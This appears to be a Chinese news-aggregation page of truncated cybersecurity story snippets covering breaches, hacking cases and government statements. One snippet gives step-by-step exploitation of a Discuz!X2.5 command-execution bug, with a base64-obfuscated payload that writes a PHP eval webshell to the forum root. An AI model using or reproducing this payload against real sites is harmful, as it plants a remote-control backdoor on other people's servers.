黑客能用声波入侵智能手机:细思极恐!
黑客能用声波入侵智能手机:细思极恐!研究人员解释了如何用声音将错误阅读信息发送到设备,通过设备的加速计发送。加速计很容易被攻击,因为它会振动。用声波冲击加速计,使其频率与振动保持一致,就可以发起攻击。黑客可以通过攻击摧毁加速计,不过密歇根大学研究人员挑战的任务更难:他们让手机、Fitbit出现异常行为。加速计将信号发送给设备,命令设备记录信息,或者完成动作,正因如此研究人员才能控制, 密歇根大学研究人员让一台Galaxy ...
一游戏公司被黑客控制 警方缴获20多万条被盗数据
一游戏公司被黑客控制 警方缴获20多万条被盗数据2016年12月7日,广州某游戏公司向公安机关报警,称其企业QQ被黑客非法控制,超级管理账号密码被篡改,包括企业内部架构、人员身份、职务信息、聊天记录、移动电话等大量涉及商业秘密的一批数据资料被盗取。因该案涉及黑客技术入侵和盗取公民个人信息、企业商业信息,广州市公安局网警支队迅速介入此案,会同企业属地天河区公安分局一起全面展开侦查取证。网警侦查发现,作案嫌疑人通过层层伪装,向涉案企业QQ发送病毒链接,植入木马程序,然后控制企业服...
美司法部起诉俄罗斯间谍 因其对雅虎发动黑客攻击
美国检方对4名犯罪嫌疑人提出47项指控,其中包括共谋、计算机欺诈和接入设备欺诈。所有指控都与2014年针对雅虎的一次网络攻击活动有关,5亿名雅虎用户的个人信息被窃取,其中包括姓名、电子邮件地址、经过加密的密码等。雅虎2016年发现并公布了这次网络攻击活动,当时称这次攻击是由“国家赞助”的黑客发动的。当时安全研究人员对这一说法有争议,现在来看似乎是正确的。当然,俄罗斯卷入针对美国科技公司的网络攻击活动并不让人感到意外。过去,美国司法部就曾指控俄罗斯黑客的网络犯罪活动。去年美国总...
企业ERP系统面临的网络安全威胁
企业ERP系统面临的网络安全威胁一、ERP系统信息安全威胁安全问题的产生是一个非常复杂的问题,包含了多种因素的相互作用。总结起来,企业ERP系统所面临的信息安全威胁主要包括来自以下几个方面的内容:(一)ERP网络应用的威胁。来自网络层面的威胁主要来自远程访问企业内部系统所造成的信息泄漏隐患。随着企业规模的不断扩展,对外的销售和物流网络也随之扩大,出差的业务员和某些客户经常需要在异地远程访问企业网络资源。为此,ERP专门提供了B/S的访问模式,使得异地用户能够使用浏览器通过虚拟...
Discuz!X2.5 Release20120407版命令执行漏洞Getshell
Discuz!X2.5 Release20120407版命令执行漏洞Getshell利用方法1.注册任意账户2.登陆用户,发表blog日志(注意是日志)3.添加图片,选择网络图片,地址{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}}4.访问日志,论坛根目录下生成demo.php,一句话密码C...
“WIFI可破解 5分钟控制用户微博”追踪
“WIFI可破解 5分钟控制用户微博”追踪家中WIFI五分钟“劫持”网内账户实验目的:测试家中WIFI内,利用黑客软件是否可以“劫持”其他网内用户资料。实验背景:在同一WIFI网内,“Evi1m0”使用一款黑客软件对另一台电脑上已登录的微博账号实施“劫持”,成功控制该微博账号的演示。实验过程:按照“Evi1m0”的演示步骤,记者首先找来一台已经越狱的智能手机,将两款必备的黑客软件安装进手机。随后,记者将手机接入家中的WIFI,同时接入一台IP尾号为119的电脑,并在电脑上登入...
京东信息泄露12G用户数据泄露 源自2013年Struts 2漏洞
京东信息泄露12G用户数据泄露 源自2013年Struts 2漏洞一本财经”昨日发布文章《京东数据疑似外泄:超过12个G,涉及数千万用户》,称最近黑市上有一12G的数据包开始流通,其中包括用户名、密码、邮箱、QQ号、电话号码、身份证等多个维度,数据多达数千万条。黑市买卖双方表示这些数据来自京东,而京东表示正紧急核实数据真伪。目前,京东得出初步结论。2013年7月的Struts 2漏洞CVE-2013-2251京东表示,经其信息安全部门依据报道内容初步判断,该数据源于2013年...
工业和信息化部关于开展互联网基础管理专项行动的通知
工业和信息化部关于开展互联网基础管理专项行动的通知附件:互联网基础管理专项行动工作方案工业和信息化部2016年11月28日 互联网基础管理专项行动工作方案 一、指导思想为贯彻习近平总书记系列重要讲话精神,落实全国社会治安综合治理创新工作会议提出的要求,为党的“十九大”胜利召开营造清朗网络空间环境,我部决定开展互联网基础管理专项行动,继续强化网站备案、IP地址、域名等互联网基础管理,提升技术能力,完善长效机制,...
韩军内网被黑客攻破 为网络司令部成立以来首次
韩军内网被黑客攻破 为网络司令部成立以来首次
被黑一事透露,入侵韩军内网的黑客们所用攻击代码与此前朝鲜黑客常用代码类似,军方因此怀疑本案系朝鲜黑客所为。朝鲜黑客2014年窃取韩国水电与核电公司核电站工程设计图时,也曾留下蛛丝马迹。韩军一直声称内部国防网与外部互联网安全隔离,但经查,部分内网计算机同时使用内网和外网使黑客有机可乘。韩国国防部相关人士5日曾透露,韩国军队内部部分电脑遭受来源不明的恶性代码攻击,就军方联合调查组的调查结果显...
中国政府坚决反对各种形式的黑客攻击和网络犯罪行为
中国政府坚决反对各种形式的黑客攻击和网络犯罪行为外交部发言人华春莹在例行记者会上表示,国际社会应该加强对话与合作,共同维护网络空间的安全、和平和开放,而不应该在没有任何事实证据的情况下,对其他国家妄加指责和猜疑。问:美国国会早前曾发布报告,指责中国政府雇佣黑客入侵美国联邦存款保险公司系统。你认为这是真的吗?答:你认为这是真的吗?!这类问题我们经常遇到。中方已多次重申,中国政府坚决反对并依法严厉打击各种形式的黑客攻击和网络犯罪行为。我们认为,国际社会应该加强对话与合作,共同维护...